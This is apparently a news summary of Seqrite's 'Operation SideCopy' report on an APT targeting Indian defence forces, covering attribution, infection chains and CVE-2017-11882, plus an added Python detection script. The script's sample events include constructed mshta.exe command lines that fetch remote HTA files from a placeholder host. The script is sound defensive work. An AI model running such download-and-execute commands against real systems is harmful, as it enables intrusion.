Security researchers report that since early 2019 an APT group has been targeting Indian defence units and armed forces personnel to steal sensitive information.
The security firm Seqrite has disclosed the campaign, which it describes as a new Advanced Persistent Threat (APT) operation aimed at India's Defence Forces.
Seqrite has named the campaign 'Operation SideCopy'. The attackers behind it were found to be misleading the security community by imitating the tactics, techniques and procedures (TTPs) of another group, and Seqrite says it has gathered firm evidence about the operation.
That evidence points to possible links with Pakistan and with the Transparent Tribe group. Seqrite also states that this makes it the first cybersecurity vendor to disclose the identity and motive of these attackers.
According to the Seqrite report, the key findings on the operation are:
- Operation SideCopy has been running from early 2019 to the present.
- The operation has targeted only Indian defence forces, armed forces and their personnel.
- The malware modules observed are under continuous development, and updated modules are released after the attackers have reviewed stolen victim data.
- The attackers keep track of detections of their malware and update modules once antivirus products flag them.
- Nearly all command-and-control (C2) servers are hosted with Contabo GmbH, and the server names correspond to machine names found in the Transparent Tribe report.
- The attackers mislead the security community by imitating TTPs that point at the SideWinder APT group.
- Seqrite suspects the actor has links with the Transparent Tribe APT group.
Before summarising the attack, Seqrite's report lists the URLs that "mshta.exe" was observed connecting to across multiple customers.
Seqrite has been tracking this campaign since it was found targeting critical Indian companies and organisations, and traces of the operation go back to early 2019.
Seqrite identified three infection chains. In two of them the initial infection vector was an LNK file delivered by malspam; in the third, the threat actors used a template injection attack combined with the Equation Editor vulnerability (CVE-2017-11882) as the initial vector.
Only the initial infection vector differs in the third chain; its final payload is related to that of the first two chains.
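The chains described above leave two behaviours on the endpoint that a defender can look for: an LNK or Office document ends up launching mshta.exe against a remote URL, and exploitation of CVE-2017-11882 shows up as an Office process spawning the Equation Editor (eqnedt32.exe). The following Python script is an added example and not code from the Seqrite report; it applies simple detection rules to a few constructed Sysmon-style process-creation events. The event records, the rule names and the hostnames under example.invalid are all made up for illustration and are not indicators from the report.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """A process-creation event (Sysmon event ID 1 style), constructed for this example."""
    parent_image: str
    image: str
    command_line: str


# Office hosts that should not normally spawn a script host or the Equation Editor.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-case file name of a Windows path, tolerating forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[Tuple[str, str]]:
    """Return (rule_name, detail) pairs for every SideCopy-style behaviour the event matches."""
    image = basename(ev.image)
    parent = basename(ev.parent_image)
    findings: List[Tuple[str, str]] = []
    # Chains 1 and 2: the LNK ends up running mshta.exe, which fetches a remote HTA.
    if image == "mshta.exe":
        m = REMOTE_URL.search(ev.command_line)
        if m:
            findings.append(("mshta_remote_hta", m.group(0)))
    # Chain 3: CVE-2017-11882 lives in the Equation Editor, so the tell-tale
    # is an Office host spawning eqnedt32.exe.
    if parent in OFFICE_HOSTS and image == "eqnedt32.exe":
        findings.append(("office_spawns_equation_editor", ev.image))
    # Any chain: an Office host spawning a script host is abnormal on its own.
    if parent in OFFICE_HOSTS and image in SCRIPT_HOSTS:
        findings.append(("office_spawns_script_host", ev.image))
    return findings


def triage(events: List[ProcEvent]) -> List[Tuple[int, List[Tuple[str, str]]]]:
    """Index every event that triggered at least one rule, with its findings."""
    hits = []
    for i, ev in enumerate(events):
        findings = classify(ev)
        if findings:
            hits.append((i, findings))
    return hits


def mshta_urls(events: List[ProcEvent]) -> List[str]:
    """Collect the remote URLs mshta.exe was launched with, the way the report tabulates them."""
    urls = set()
    for _, findings in triage(events):
        for rule, detail in findings:
            if rule == "mshta_remote_hta":
                urls.add(detail)
    return sorted(urls)


# Constructed sample telemetry: three malicious-looking events and two benign ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "http://c2.example.invalid/update.hta"'),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r'"C:\...\EQNEDT32.EXE" -Embedding'),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\mshta.exe",
              r"mshta http://docs.example.invalid/template.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\ProgramData\Vendor\help.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r"notepad.exe notes.txt"),
]


if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS):
        for rule, detail in findings:
            print(f"event {idx}: {rule}: {detail}")
    print("mshta URLs:", mshta_urls(SAMPLE_EVENTS))
```

Event 3 shows the caveat: mshta.exe running a local HTA is common enough in enterprise software that the rule keys on a remote URL, and the Office-parent rules fire regardless of the command line because a document should not be spawning those binaries at all.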
Infection Chain 1
Infection Chain 2
Infection Chain 3
Seqrite's researchers are still investigating the operation closely. They assert that the actor behind it is a sub-division of the Transparent Tribe APT group and is imitating the TTPs of other attackers in order to deceive the security community.